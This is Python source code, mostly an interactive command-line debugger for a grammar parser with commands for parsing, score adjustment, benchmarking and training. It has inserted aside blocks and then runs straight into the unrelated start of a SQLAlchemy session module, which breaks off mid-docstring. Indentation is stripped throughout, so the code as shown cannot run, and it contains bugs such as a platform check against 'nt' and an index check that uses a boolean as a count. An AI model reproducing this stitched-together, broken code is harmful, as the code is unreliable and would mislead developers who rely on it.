def model_loader(self) -> ModelLoader:
return self._model_loader
@property
def max_parse_index(self) -> int:
if self._show_broken:
return len(self._parses) - 1 if self._parses else 0
return self._whole_parses - 1 if self._whole_parses else 0
@property
def parses_available(self) -> bool:
return bool(self._parser_state if self._show_broken else self._whole_parses)
@property
def last_input_text(self) -> Optional[str]:
return self._last_input_text
def onecmd(self, line: str) -> Optional[bool]:
# noinspection PyBroadException
try:
return cmd.Cmd.onecmd(self, line)
except Exception:
traceback.print_exc()
def precmd(self, line: str) -> str:
# Pre-processes command lines before they are executed.
line = line.strip()
if not line:
return line
command = line.split()[0]
if command == '+':
return 'good' + line[1:]
if command == '-':
return 'bad' + line[1:]
if command == '++':
return 'best' + line[2:]
if command == '--':
return 'worst' + line[2:]
return line
def postcmd(self, stop: Optional[bool], line: str) -> Optional[bool]:
# Post-processes command results before they are passed back to the
# command interpreter.
print('') # Print a blank line for clarity
return stop
def emptyline(self) -> Optional[bool]:
# Called when the user just hits enter with no input.
return self.do_next()
def default(self, line: str) -> Optional[bool]:
# Called when the command is unrecognized. By default, we assume
# it's a parse request.
return self.do_parse(line)
@staticmethod
def do_shell(line: str) -> None:
# Called when the command starts with "!".
try:
print(eval(line))
except SyntaxError:
exec(line)
def do_quit(self, line: str) -> Optional[bool]:
"""Save scoring features and exit the parser debugger."""
if line:
print("'quit' command does not accept arguments.")
return
self.do_save() # Save what we're doing first.
return True # Indicate we're ready to stop.
def do_exit(self, line: str) -> Optional[bool]:
"""Alias for quit."""
if line:
print("'exit' command does not accept arguments.")
return
return self.do_quit(line)
def do_bye(self, line: str) -> Optional[bool]:
"""Alias for quit."""
if line:
print("'bye' command does not accept arguments.")
return
return self.do_quit(line)
def do_done(self, line: str) -> Optional[bool]:
"""Alias for quit."""
if line:
print("'done' command does not accept arguments.")
return
return self.do_quit(line)
@staticmethod
def do_cls(_line: str) -> None:
"""Clears the screen."""
if sys.platform == 'nt':
os.system('cls')
else:
os.system('clear')
@staticmethod
def do_clear(_line: str) -> None:
"""Clears the screen."""
if sys.platform == 'nt':
os.system('cls')
else:
os.system('clear')
def do_standardize(self, line: str) -> None:
"""Standardizes the parser's files."""
if not line:
if self._model and self._model.config_info:
config_info = self._model.config_info
else:
config_info = self._model_loader.load_model_config()
else:
config_info = ModelConfig(line)
self._model_loader.standardize_model(config_info)
def do_short(self, line: str) -> None:
"""Causes parses to be printed in short form instead of long form."""
if line:
print("'short' command does not accept arguments.")
return
self._simple = True
print("Parses will now be printed in short form.")
def do_broken(self, line: str) -> None:
"""Causes parses that have more pieces or gaps than necessary to be
listed."""
if line:
print("'broken' command does not accept arguments.")
return
self._show_broken = True
print("Parses with more pieces or gaps than necessary will now be listed.")
def do_whole(self, line: str) -> None:
"""Causes only parses that have no more pieces or gaps than necessary to be listed."""
if line:
print("'whole' command does not accept arguments.")
return
self._show_broken = False
self._parse_index = min(self._parse_index, self.max_parse_index)
print("Only parses with no more pieces or gaps than necessary will now be listed.")
def do_long(self, line: str) -> None:
"""Causes parses to be printed in long form instead of short form."""
if line:
print("'long' command does not accept arguments.")
return
self._simple = False
print("Parses will now be printed in long form.")
def do_fast(self, line: str) -> None:
"""Causes parsing to stop as soon as a single parse is found."""
if line:
print("'fast' command does not accept arguments.")
return
self._fast = True
print("Parsing will now stop as soon as a single parse is found.")
def do_complete(self, line: str) -> None:
"""Causes parsing to continue until all parses have been identified."""
if line:
print("'complete' command does not accept arguments.")
return
self._fast = False
print("Parsing will now continue until all parses have been identified.")
def do_load(self, line: str = '') -> None:
"""Save scoring features and load a parser from the given configuration file."""
self.do_save()
if not line:
line = self._model.config_info.config_file_path
if not os.path.isfile(line):
print("File not found: " + line)
return
config_info = ModelConfig(line)
self._model = self._model_loader.load_model(config_info)
self._parser_state = None
self._benchmark = (SampleUtils.load(config_info.benchmark_file)
if os.path.isfile(config_info.benchmark_file)
else None)
self._benchmark_dirty = False
def do_reload(self, line: str = '') -> None:
"""Save scoring features and reload the last configuration file provided."""
if line:
print("'reload' command does not accept arguments.")
return
self.do_save()
self.do_load(self._model.config_info.config_file_path
if self._model and self._model.config_info
else '')
def do_save(self, line: str = '') -> None:
"""Save scoring features."""
if line:
print("'save' command does not accept arguments.")
return
if self._model is not None:
self._model_loader.save_scoring_features(self._model)
if self._benchmark_dirty:
SampleUtils.save(self._benchmark, self._model.config_info.benchmark_file)
self._benchmark_dirty = False
def do_discard(self, line: str = '') -> None:
"""Discard scoring features."""
if line:
print("'discard' command does not accept arguments.")
return
self._model_loader.load_scoring_features(self._model)
config_info = self._model.config_info
if os.path.isfile(config_info.benchmark_file):
self._benchmark = SampleUtils.load(config_info.benchmark_file)
else:
self._benchmark = None
self._benchmark_dirty = False
@staticmethod
def do_compare(line: str) -> None:
"""Compare two categories to determine if either contains the other."""
definitions = [definition for definition in line.split() if definition]
if len(definitions) == 0:
print("Nothing to compare.")
return
if len(definitions) == 1:
print("Nothing to compare with.")
return
categories = set()
for definition in definitions:
categories.add(GrammarParser.parse_category(definition,
offset=line.find(definition) + 1))
categories = sorted(categories, key=str)
for category1 in categories:
for category2 in categories:
if category1 is not category2:
contains_phrase = [" does not contain ", " contains "][category2 in category1]
print(str(category1) + contains_phrase + str(category2))
def do_timeout(self, line: str) -> None:
"""Set (or display) the timeout duration for parsing."""
if not line:
print("Parsing timeout duration is currently " + str(self._timeout_interval) +
" seconds")
return
try:
try:
# Only bother with this because an integer looks prettier
# when printed.
self._timeout_interval = int(line)
except ValueError:
self._timeout_interval = float(line)
except ValueError:
print("Timeout duration could not be set to this value.")
else:
print("Set parsing timeout duration to " + str(self._timeout_interval) + " seconds.")
def _do_parse(self, line: str, timeout: float, new_parser_state: bool = True,
restriction_category: Category = None, fast: bool = None,
emergency: bool = False) -> Tuple[bool, bool, bool]:
if fast is None:
fast = self._fast
if new_parser_state or self._parser_state is None:
self._parser_state = ParsingAlgorithm.new_parser_state(self._model)
parse = ParsingAlgorithm.parse(self._parser_state, line, fast, timeout, emergency)
parse_timed_out = time.time() >= timeout
emergency_disambiguation = False
if restriction_category:
parse = parse.restrict(restriction_category)
self._parses = [disambiguation
for (disambiguation, rank)
in parse.get_sorted_disambiguations(None, None, timeout)]
if not self._parses:
emergency_disambiguation = True
self._parses = [parse.disambiguate()]
disambiguation_timed_out = time.time() >= timeout
self._whole_parses = len([disambiguation
for disambiguation in self._parses
if ((len(disambiguation.parse_trees)
== len(self._parses[0].parse_trees)) and
(disambiguation.total_gap_size()
== self._parses[0].total_gap_size()))])
self._parse_index = 0
self._last_input_text = line
return emergency_disambiguation, parse_timed_out, disambiguation_timed_out
def _handle_parse(self, line: str, new_parser_state: bool = True,
restriction_category: Category = None, fast: bool = None,
emergency: bool = False) -> None:
"""Handle parsing on behalf of do_parse, do_as, and do_extend."""
if not line:
print("Nothing to parse.")
return
start_time = time.time()
timeout = start_time + self._timeout_interval
emergency_disambig, parse_timed_out, disambig_timed_out = \
self._do_parse(line, timeout, new_parser_state, restriction_category, fast, emergency)
end_time = time.time()
print('')
if parse_timed_out:
print("*** Parse timed out. ***")
if disambig_timed_out:
print("*** Disambiguation timed out. ***")
if emergency_disambig:
print("*** Using emergency (non-optimal) disambiguation. ***")
print('')
print("Total parse time: " + str(
round(end_time - start_time, 3)) + " seconds")
print("Total number of parses: " + str(len(self._parses)))
print("Total number of whole parses: " + str(self._whole_parses))
print('')
self.do_current()
def do_parse(self, line: str) -> None:
"""Parse an input string and print the highest-scoring parse for it."""
self._handle_parse(line, emergency=self._emergency_mode)
def do_as(self, line: str) -> None:
"""Parse an input string as a particular category and print the
highest-scoring parse for it."""
if not line:
print("No category specified.")
return
category_definition = line.split()[0]
category = GrammarParser.parse_category(category_definition)
line = line[len(category_definition):].strip()
self._handle_parse(line, restriction_category=category, emergency=self._emergency_mode)
def do_extend(self, line: str) -> None:
"""Extend the previous input string with additional text and print the
highest-scoring parse for the combined input strings."""
self._handle_parse(line, new_parser_state=False, emergency=self._emergency_mode)
def do_files(self, line: str) -> None:
"""List the word list files containing a given word."""
if not line:
print("No word specified.")
return
if len(line.split()) > 1:
print("Expected only one word.")
return
word = line.strip()
config_info = (self._model.config_info
if self._model and self._model.config_info
else self._model_loader.load_model_config())
found = False
for folder_path in config_info.word_sets_folders:
for filename in os.listdir(folder_path):
if not filename.lower().endswith('.ctg'):
continue
file_path = os.path.join(folder_path, filename)
with open(file_path) as word_set_file:
words = set(word_set_file.read().split())
if word in words:
print(repr(word) + " found in " + file_path + ".")
found = True
if not found:
print(repr(word) + " not found in any word list files.")
def do_add(self, line: str) -> None:
"""Adds a word to a given category's word list file."""
if not line:
print("No category specified.")
return
category_definition = line.split()[0]
category = GrammarParser.parse_category(category_definition)
words_to_add = sorted(set(line[len(category_definition):].strip().split()))
if not words_to_add:
print("No words specified.")
return
config_info = (self._model.config_info
if self._model and self._model.config_info
else self._model_loader.load_model_config())
found = False
for folder_path in config_info.word_sets_folders:
for filename in os.listdir(folder_path):
if not filename.lower().endswith('.ctg'):
continue
file_category = GrammarParser.parse_category(filename[:-4])
if file_category != category:
continue
file_path = os.path.join(folder_path, filename)
with open(file_path) as word_set_file:
words = set(word_set_file.read().split())
for w in words_to_add:
if w in words:
print(repr(w) + " was already in " + file_path + ".")
else:
print("Adding " + repr(w) + " to " + file_path + ".")
words.add(w)
with open(file_path, 'w') as word_set_file:
word_set_file.write('\n'.join(sorted(words)))
found = True
if not found:
for folder_path in config_info.word_sets_folders:
file_path = os.path.join(folder_path, str(category) + '.ctg')
print("Creating " + file_path + ".")
with open(file_path, 'w') as word_set_file:
word_set_file.write('\n'.join(sorted(words_to_add)))
break
else:
print("No word sets folder identified. Cannot add words.")
return
self.do_reload()
def do_remove(self, line: str) -> None:
"""Removes a word from a given category's word list file."""
if not line:
print("No category specified.")
return
category_definition = line.split()[0]
words_to_remove = set(line[len(category_definition):].strip().split())
if not words_to_remove:
print("No words specified.")
return
category = GrammarParser.parse_category(category_definition)
config_info = (self._model.config_info
if self._model and self._model.config_info
else self._model_loader.load_model_config())
found = set()
for folder_path in config_info.word_sets_folders:
for filename in os.listdir(folder_path):
if not filename.lower().endswith('.ctg'):
continue
file_category = GrammarParser.parse_category(filename[:-4])
if file_category != category:
continue
file_path = os.path.join(folder_path, filename)
with open(file_path) as words_file:
words = set(words_file.read().split())
for w in sorted(words_to_remove):
if w in words:
print("Removing " + repr(w) + " from " + file_path + ".")
words.remove(w)
found.add(w)
else:
print(repr(w) + " not found in " + file_path + ".")
if words:
with open(file_path, 'w') as words_file:
words_file.write('\n'.join(sorted(words)))
else:
print("Deleting empty word list file " + file_path + ".")
os.remove(file_path)
if words_to_remove - found:
print("No file(s) found containing the following words: " +
' '.join(repr(word) for word in sorted(words_to_remove - found)) + ".")
return
self.do_reload()
def do_profile(self, line: str) -> None:
"""Profiles the execution of a command, printing the profile statistics."""
# Only a function at the module level can be profiled. To get
# around this limitation, we define a temporary module-level
# function that calls the method we want to profile.
global function_to_profile
def _function_to_profile():
self.onecmd(line)
function_to_profile = _function_to_profile
profile.run('function_to_profile()')
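# ---------------------------------------------------------------------------
# Illustrative aside, not part of the original module: do_profile() above
# resorts to a module-level global because profile.run() evaluates a string
# expression and can therefore only see module-level names. A minimal sketch
# of an alternative that profiles an arbitrary callable directly with
# cProfile.Profile, avoiding the global entirely; all names below are
# hypothetical.
import cProfile
import pstats

def profile_callable(func, *args, **kwargs):
    """Profile ``func(*args, **kwargs)`` and print cumulative-time statistics."""
    profiler = cProfile.Profile()
    profiler.enable()
    try:
        result = func(*args, **kwargs)
    finally:
        profiler.disable()
    pstats.Stats(profiler).sort_stats('cumulative').print_stats(20)
    return result
# Example: profile_callable(sorted, range(10000), key=lambda x: -x)
# ---------------------------------------------------------------------------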
def do_analyze(self, line: str) -> None:
"""Analyzes the last parse and prints statistics useful for debugging."""
if line:
print("'analyze' command does not accept arguments.")
return
if self._parser_state is None:
print("Nothing to analyze.")
return
print('Covered: ' + repr(self._parser_state.is_covered()))
rule_counts, rule_nodes = self._get_rule_map()
counter = 0
for rule in sorted(rule_counts, key=rule_counts.get, reverse=True):
print(str(rule) + " (" + str(rule_counts[rule]) + " nodes)")
for node_str in sorted(ParseTreeUtils.to_str(node, simplify=True)
for node in rule_nodes[rule]):
print(' ' + node_str.replace('\n', '\n '))
counter += node_str.count('\n') + 1
if counter >= 100:
break
print("Rules in waiting:")
rule_counts = {}
for node in self._parser_state.insertion_queue:
rule_counts[node.rule] = rule_counts.get(node.rule, 0) + 1
for rule in sorted(rule_counts, key=rule_counts.get, reverse=True):
print(str(rule) + " (" + str(rule_counts[rule]) + " nodes)")
def _get_rule_map(self) -> Tuple[Dict[ParseRule, int],
Dict[ParseRule, List[TreeNodeSet]]]:
"""Collect and count the nodes, organized by rule, from the latest parse's category map."""
cat_map = self._parser_state.category_map
rule_counts = {}
rule_nodes = {}
for start, category, end in cat_map:
for node_set in cat_map.iter_node_sets(start, category, end):
for node in node_set:
rule_counts[node.rule] = rule_counts.get(node.rule, 0) + 1
rule_nodes[node.rule] = rule_nodes.get(node.rule, []) + [node]
return rule_counts, rule_nodes
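# ---------------------------------------------------------------------------
# Illustrative aside, not part of the original module: _get_rule_map() above
# accumulates per-rule counts and node lists with dict.get(). The standard
# library's Counter and defaultdict express the same bookkeeping more
# directly; a sketch, assuming ``nodes`` is any iterable of objects exposing
# a ``rule`` attribute.
from collections import Counter, defaultdict

def count_nodes_by_rule(nodes):
    """Return (rule -> node count, rule -> list of nodes)."""
    rule_counts = Counter()
    rule_nodes = defaultdict(list)
    for node in nodes:
        rule_counts[node.rule] += 1
        rule_nodes[node.rule].append(node)
    return rule_counts, dict(rule_nodes)
# ---------------------------------------------------------------------------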
def do_links(self, line: str) -> None:
"""Display the semantic net links for the current parse."""
if line:
print("'links' command does not accept arguments.")
return
if self.parses_available:
parse = self._parses[self._parse_index]
for sentence in parse.get_parse_graphs():
print(sentence)
print('')
else:
print("No parses found.")
def do_reverse(self, line: str) -> None:
"""Display token sequences that produce the same semantic net links as the current parse."""
if line:
print("'reverse' command does not accept arguments.")
return
if self.parses_available:
parse = self._parses[self._parse_index]
start_time = time.time()
sentences = list(parse.get_parse_graphs())
results = [GenerationAlgorithm().generate(self._model, sentence)
for sentence in sentences]
end_time = time.time()
for sentence, result in zip(sentences, results):
print(sentence)
print('')
for tree in sorted(result, key=lambda t: t.tokens):
text = ' '.join(tree.tokens)
text = text[:1].upper() + text[1:]
for punctuation in ',.?!:;)]}':
text = text.replace(' ' + punctuation, punctuation)
for punctuation in '([{':
text = text.replace(punctuation + ' ', punctuation)
print('"' + text + '"')
print(tree)
print('')
print('')
print("Total time: " + str(end_time - start_time) + " seconds")
print('')
else:
print("No parses found.")
def do_current(self, line: str = '') -> None:
"""Reprint the current parse for the most recent input string."""
if line:
print("'current' command does not accept arguments.")
return
if self.parses_available:
parse = self._parses[self._parse_index]
gaps = parse.total_gap_size()
size = len(parse.parse_trees)
score, confidence = parse.get_weighted_score()
print("Parses #" + str(self._parse_index + 1) + " of " +
str(self.max_parse_index + 1) + ":")
print(parse.to_str(self._simple))
print("Gaps: " + str(gaps))
print("Size: " + str(size))
print("Score: " + str(score))
print("Confidence: " + str(confidence))
print("Coverage: " + str(parse.coverage))
else:
print("No parses found.")
def do_next(self, line: str = '') -> None:
"""Print the next parse for the most recent input string."""
if line:
print("'next' command does not accept arguments.")
return
if self.parses_available:
if self._parse_index >= self.max_parse_index:
print("No more parses available.")
return
self._parse_index += 1
self.do_current()
def do_previous(self, line: str) -> None:
"""Print the previous parse for the most recent input string."""
if line:
print("'next' command does not accept arguments.")
return
if self.parses_available:
if self._parse_index <= 0:
print("No more parses available.")
return
self._parse_index -= 1
self.do_current()
def do_first(self, line: str) -> None:
"""Print the first parse for the most recent input string."""
if line:
print("'first' command does not accept arguments.")
return
self._parse_index = 0
self.do_current()
def do_last(self, line: str) -> None:
"""Print the last parse for the most recent input string."""
if line:
print("'last' command does not accept arguments.")
return
self._parse_index = self.max_parse_index
self.do_current()
def do_show(self, line: str) -> None:
"""Print the requested parse for the most recent input string."""
if len(line.split()) != 1:
print("'show' command requires a single integer argument.")
return
try:
index = int(line.strip())
except ValueError:
print("'show' command requires a single integer argument.")
return
if not (index and (-(self.parses_available + 1) <= index <= self.parses_available + 1)):
print("Index out of range.")
return
if index < 0:
index += self.parses_available + 1
else:
index -= 1
self._parse_index = index
self.do_current()
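# ---------------------------------------------------------------------------
# Illustrative aside, not part of the original module: do_show() above maps a
# 1-based, optionally negative, user-supplied index onto the 0-based list of
# parses. A standalone sketch of that style of normalization, where ``count``
# is the number of available parses (both names are hypothetical).
def normalize_one_based_index(index, count):
    """Map 1..count (or -count..-1, counting from the end) to a 0-based index."""
    if index == 0 or not -count <= index <= count:
        raise IndexError("index out of range")
    return index + count if index < 0 else index - 1
# normalize_one_based_index(1, 5) == 0; normalize_one_based_index(-1, 5) == 4
# ---------------------------------------------------------------------------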
def do_gaps(self, line: str) -> None:
"""Print the gaps in the current parse."""
if line:
print("'gaps' command does not accept arguments.")
return
if self.parses_available:
parse = self._parses[self._parse_index]
print("Gaps: " + str(parse.total_gap_size()))
for start, end in parse.iter_gaps():
print(' ' + str(start) + ' to ' + str(end) + ': ' +
' '.join(parse.tokens[start:end]))
else:
print("No parses found.")
def do_best(self, line: str) -> None:
"""Adjust the score upward for the most recently printed parse until it
is higher than all others returned."""
if line:
print("'best' command does not accept arguments.")
return
if not self._parses:
print("No parses available for adjustment.")
return
best_parse = self._parses[self._parse_index]
for _ in range(100):
self._parses[self._parse_index].adjust_score(True)
ranks = {}
for parse in self._parses:
ranks[parse] = parse.get_rank()
self._parses.sort(key=ranks.get, reverse=True)
self._parse_index = [id(parse) for parse in self._parses].index(id(best_parse))
if (self._parses[0] is best_parse or
(len(self._parses[self._parse_index - 1].parse_trees)
!= len(best_parse.parse_trees)) or
(self._parses[self._parse_index - 1].total_gap_size()
!= best_parse.total_gap_size())):
break
if self._parse_index == 0:
print("Successfully made this parse the highest ranked.")
else:
print("Failed to make this parse the highest ranked.")
def do_worst(self, line: str) -> None:
"""Adjust the score downward for the most recently printed parse until
it is lower than all others returned."""
if line:
print("'worst' command does not accept arguments.")
return
if not self._parses:
print("No parses available for adjustment.")
return
worst_parse = self._parses[self._parse_index]
for _ in range(100):
self._parses[self._parse_index].adjust_score(False)
ranks = {}
for parse in self._parses:
ranks[parse] = parse.get_rank()
self._parses.sort(key=ranks.get, reverse=True)
self._parse_index = [id(parse) for parse in self._parses].index(id(worst_parse))
if (self._parses[-1] is worst_parse or
(len(self._parses[self._parse_index + 1].parse_trees)
!= len(worst_parse.parse_trees)) or
(self._parses[self._parse_index + 1].total_gap_size()
!= worst_parse.total_gap_size())):
break
if self._parse_index == self.max_parse_index:
print("Successfully made this parse the lowest ranked.")
else:
print("Failed to make this parse the lowest ranked.")
def do_good(self, line: str) -> None:
"""Adjust the score upward for the most recently printed parse."""
if line:
print("'next' command does not accept arguments.")
return
if not self._parses:
print("No parses available for adjustment.")
return
self._parses[self._parse_index].adjust_score(True)
def do_bad(self, line: str) -> None:
"""Adjust the score downward for the most recently printed parse."""
if line:
print("'next' command does not accept arguments.")
return
if not self._parses:
print("No parses available for adjustment.")
return
self._parses[self._parse_index].adjust_score(False)
def _get_benchmark_parser_output(self) -> str:
parse = self._parses[self._parse_index]
result = set()
for sentence in parse.get_parse_graphs():
result.add(str(sentence))
return '\n'.join(sorted(result))
def do_keep(self, line: str) -> None:
"""Save the current parse as benchmark case."""
if line:
print("'keep' command does not accept arguments.")
return
if not self._parses:
print("No parses available.")
return
assert self._benchmark is not None
self._benchmark[Input(self.last_input_text)] = Target(self._get_benchmark_parser_output())
self._benchmark_dirty = True
# noinspection PyUnusedLocal
def _test_attempt_iterator(self, text: Input, target: Target) -> Iterator[Tuple[Attempt, None]]:
start_time = time.time()
emergency_disambig, parse_timed_out, disambig_timed_out = \
self._do_parse(text, start_time + self._timeout_interval)
end_time = time.time()
self._benchmark_emergency_disambiguations += int(emergency_disambig)
self._benchmark_parse_timeouts += int(parse_timed_out)
self._benchmark_disambiguation_timeouts += int(disambig_timed_out)
self._benchmark_time += end_time - start_time
yield Attempt(self._get_benchmark_parser_output()), None
# noinspection PyUnusedLocal
def _report_benchmark_progress(self, result: Result) -> None:
assert self._benchmark is not None
self._benchmark_tests_completed += 1
if time.time() >= self._benchmark_update_time + 1:
print("Benchmark " +
str(round((100 * self._benchmark_tests_completed / float(len(self._benchmark))),
ndigits=1)) +
"% complete...")
self._benchmark_update_time = time.time()
def do_benchmark(self, line: str) -> None:
"""Parse all benchmark samples and report statistics on them as a batch."""
if line:
print("'benchmark' command does not accept arguments.")
return
if not self._benchmark:
print("No benchmarking samples.")
return
self._benchmark_emergency_disambiguations = 0
self._benchmark_parse_timeouts = 0
self._benchmark_disambiguation_timeouts = 0
self._benchmark_time = 0.0
self._benchmark_tests_completed = 0
self._benchmark_update_time = time.time()
failures = [] # type: List[Failure]
tally = ModelBatchController(self._validate_output)\
.run_batch(self._benchmark, self._test_attempt_iterator,
self._report_benchmark_progress, failures.append)
print("")
if failures:
print('')
print("Failures:")
for failure in failures:
print(failure.input)
print(failure.first_attempt)
print(failure.target)
print('')
print("Score: " + str(round(100 * tally.avg_first_attempt_score, 1)) + "%")
print("Average Parse Time: " + str(round(self._benchmark_time / float(len(self._benchmark)),
ndigits=1)) +
' seconds per parse')
print("Samples Evaluated: " + str(len(self._benchmark)))
print("Emergency Disambiguations: " + str(self._benchmark_emergency_disambiguations) +
" (" + str(round(100 * self._benchmark_emergency_disambiguations
/ float(len(self._benchmark)), ndigits=1)) + '%)')
print("Parse Timeouts: " + str(self._benchmark_parse_timeouts) + " (" +
str(round(100 * self._benchmark_parse_timeouts / float(len(self._benchmark)),
ndigits=1)) + '%)')
print("Disambiguation Timeouts: " + str(self._benchmark_disambiguation_timeouts) + " (" +
str(round(100 * self._benchmark_disambiguation_timeouts / float(len(self._benchmark)),
ndigits=1)) + '%)')
def _scoring_function(self, target: float) -> None:
# NOTE: It is important that positive reinforcement not
# occur if the first try gives the right answer and
# the score is already >= .9; otherwise, it will
# throw off the relative scoring of other parses.
if (not target or self._parse_index or
self._parses[self._parse_index].get_weighted_score()[0] < .9):
self._parses[self._parse_index].adjust_score(target)
def _training_attempt_iterator(self, text: Input,
target: Target) -> Iterator[Tuple[Attempt, FeedbackReceiver]]:
print(text)
# Restrict it to the correct category and token_start_index from there. This gives the
# parser a leg up when it's far from the correct response.
split_index = target.index(':')
target_category = GrammarParser.parse_category(target[:split_index])
start_time = time.time()
end_time = start_time + self._timeout_interval
emergency_disambig, parse_timed_out, disambig_timed_out = \
self._do_parse(text, end_time, restriction_category=target_category)
end_time = time.time()
self._benchmark_emergency_disambiguations += int(emergency_disambig)
self._benchmark_parse_timeouts += int(parse_timed_out)
self._benchmark_disambiguation_timeouts += int(disambig_timed_out)
self._benchmark_time += end_time - start_time
# We shouldn't keep going if there are no parses of the correct category. This most likely
# indicates a change in the grammar, not a problem with the model.
assert self.parses_available
while self._parse_index <= self.max_parse_index:
# (benchmark target, scoring function)
yield self._get_benchmark_parser_output(), self._scoring_function
self._parse_index += 1
# Now try it without any help (no category restriction this time).
start_time = time.time()
end_time = start_time + self._timeout_interval
emergency_disambig, parse_timed_out, disambig_timed_out = self._do_parse(text, end_time)
end_time = time.time()
self._benchmark_emergency_disambiguations += int(emergency_disambig)
self._benchmark_parse_timeouts += int(parse_timed_out)
self._benchmark_disambiguation_timeouts += int(disambig_timed_out)
self._benchmark_time += end_time - start_time
if self.parses_available:
while self._parse_index <= self.max_parse_index:
# (benchmark target, scoring function)
yield self._get_benchmark_parser_output(), self._scoring_function
self._parse_index += 1
@staticmethod
def _validate_output(output_val: str, target: str) -> bool:
if ':' not in output_val:
return False
split_index = target.index(':')
target_category = GrammarParser.parse_category(target[:split_index])
target_structure = target[split_index:]
split_index = output_val.index(':')
output_category = GrammarParser.parse_category(output_val[:split_index])
output_structure = output_val[split_index:]
return output_category in target_category and target_structure == output_structure
def do_train(self, line: str) -> None:
"""Automatically adjust scoring to improve benchmark statistics."""
if line:
print("'train' command does not accept arguments.")
return
if not self._benchmark:
print("No benchmarking samples.")
return
self._benchmark_emergency_disambiguations = 0
self._benchmark_parse_timeouts = 0
self._benchmark_disambiguation_timeouts = 0
self._benchmark_time = 0.0
self._benchmark_tests_completed = 0
self._benchmark_update_time = time.time()
failures = [] # type: List[Failure]
tally = ModelBatchController(self._validate_output)\
.run_batch(self._benchmark, self._training_attempt_iterator,
self._report_benchmark_progress, failures.append)
print("")
if failures:
print('')
print("Failures:")
for failure in failures:
print(failure.input)
print(failure.first_attempt)
print(failure.target)
print('')
print("Score: " + str(round(100 * tally.avg_first_attempt_score, 1)) + "%")
print("Average Parse Time: " + str(round(self._benchmark_time / float(len(self._benchmark)),
ndigits=1)) +
' seconds per parse')
print("Samples Evaluated: " + str(len(self._benchmark)))
print("Emergency Disambiguations: " + str(self._benchmark_emergency_disambiguations) +
" (" + str(round(100 * self._benchmark_emergency_disambiguations
/ float(len(self._benchmark)), ndigits=1)) + '%)')
print("Parse Timeouts: " + str(self._benchmark_parse_timeouts) + " (" +
str(round(100 * self._benchmark_parse_timeouts / float(len(self._benchmark)),
ndigits=1)) + '%)')
print("Disambiguation Timeouts: " + str(self._benchmark_disambiguation_timeouts) + " (" +
str(round(100 * self._benchmark_disambiguation_timeouts / float(len(self._benchmark)),
ndigits=1)) + '%)')
def do_training(self, line: str) -> None:
"""Repeatedly train and save until user hits Ctrl-C."""
if line:
print("'training' command does not accept arguments.")
return
if not self._benchmark:
print("No benchmarking samples.")
return
iteration = 0
while True:
try:
iteration += 1
print("Iteration:", iteration)
self.do_train('')
self.do_save('')
except KeyboardInterrupt:
self.do_save('')
break
def do_list(self, line: str) -> None:
"""List all benchmark samples."""
if line:
print("'list' command does not accept arguments.")
return
if not self._benchmark:
print("No benchmarking samples.")
return
print(str(len(self._benchmark)) + " recorded benchmark samples:")
max_tokens = 0
total_tokens = 0
for input_val in sorted(self._benchmark):
print(" " + input_val)
count = len(list(self._model.tokenizer.tokenize(input_val)))
total_tokens += count
if count > max_tokens:
max_tokens = count
print('')
print("Longest benchmark sample: " + str(max_tokens) + " tokens")
print("Average benchmark sample length: " +
str(round(total_tokens / float(len(self._benchmark)), ndigits=1)) + " tokens")
def do_visualize(self, line: str) -> None:
"""Visualize the most recent parse."""
if line:
print("'visualize' command does not accept arguments.")
return
if Digraph is None:
print('The graphviz library is not installed.')
return
if self.parses_available:
parse = self._parses[self._parse_index]
gv_graph = Digraph()
for graph in parse.get_parse_graphs():
with gv_graph.subgraph() as subgraph:
graph.visualize(subgraph)
gv_graph.view()
else:
print("No parses found.")
def do_emergency(self, line: str) -> None:
"""Set, clear, or display the emergency parsing mode flag."""
line = line.strip()
if line == 'on':
self._emergency_mode = True
print("Emergency mode is on.")
elif line == 'off':
self._emergency_mode = False
print("Emergency mode is off.")
elif not line:
print('Emergency mode is %s.' % ('on' if self._emergency_mode else 'off'))
else:
print('Unexpected argument: ' + line)
def repl(model_loader: ModelLoader) -> None:
"""Run the interactive command line interface to the parser."""
parser_cmd = ParserCmd(model_loader)
print('')
parser_cmd.cmdloop()
"""Provides the Session class and related utilities."""
import weakref
from .. import util, sql, engine, exc as sa_exc
from ..sql import util as sql_util, expression
from . import (
SessionExtension, attributes, exc, query,
loading, identity
)
from ..inspection import inspect
from .base import (
object_mapper, class_mapper,
_class_to_mapper, _state_mapper, object_state,
_none_set, state_str, instance_str
)
from .unitofwork import UOWTransaction
from . import state as statelib
import sys
__all__ = ['Session', 'SessionTransaction', 'SessionExtension', 'sessionmaker']
_sessions = weakref.WeakValueDictionary()
"""Weak-referencing dictionary of :class:`.Session` objects.
"""
def _state_session(state):
"""Given an :class:`.InstanceState`, return the :class:`.Session`
associated, if any.
"""
if state.session_id:
try:
return _sessions[state.session_id]
except KeyError:
pass
return None
class _SessionClassMethods(object):
"""Class-level methods for :class:`.Session`, :class:`.sessionmaker`."""
@classmethod
def close_all(cls):
"""Close *all* sessions in memory."""
for sess in _sessions.values():
sess.close()
@classmethod
@util.dependencies("sqlalchemy.orm.util")
def identity_key(cls, orm_util, *args, **kwargs):
"""Return an identity key.
This is an alias of :func:`.util.identity_key`.
"""
return orm_util.identity_key(*args, **kwargs)
@classmethod
def object_session(cls, instance):
"""Return the :class:`.Session` to which an object belongs.
This is an alias of :func:`.object_session`.
"""
return object_session(instance)
ACTIVE = util.symbol('ACTIVE')
PREPARED = util.symbol('PREPARED')
COMMITTED = util.symbol('COMMITTED')
DEACTIVE = util.symbol('DEACTIVE')
CLOSED = util.symbol('CLOSED')
class SessionTransaction(object):
"""A :class:`.Session`-level transaction.
:class:`.SessionTransaction` is a mostly behind-the-scenes object
not normally referenced directly by application code. It coordinates
among multiple :class:`.Connection` objects, maintaining a database
transaction for each one individually, committing or rolling them
back all at once. It also provides optional two-phase commit behavior
which can augment this coordination operation.
The :attr:`.Session.transaction` attribute of :class:`.Session`
refers to the current :class:`.SessionTransaction` object in use, if any.
A :class:`.SessionTransaction` is associated with a :class:`.Session`
in its default mode of ``autocommit=False`` immediately upon construction,
initially associated with no database connections. As the :class:`.Session` is called upon
to emit SQL on behalf of various :class:`.Engine` or :class:`.Connection`
objects, a corresponding :class:`.Connection` and associated
:class:`.Transaction` is added to a collection within the
:class:`.SessionTransaction` object, becoming one of the
connection/transaction pairs maintained by the
:class:`.SessionTransaction`.
The lifespan of the :class:`.SessionTransaction` ends when the
:meth:`.Session.commit`, :meth:`.Session.rollback` or
:meth:`.Session.close` methods are called. At this point, the
:class:`.SessionTransaction` removes its association with its parent
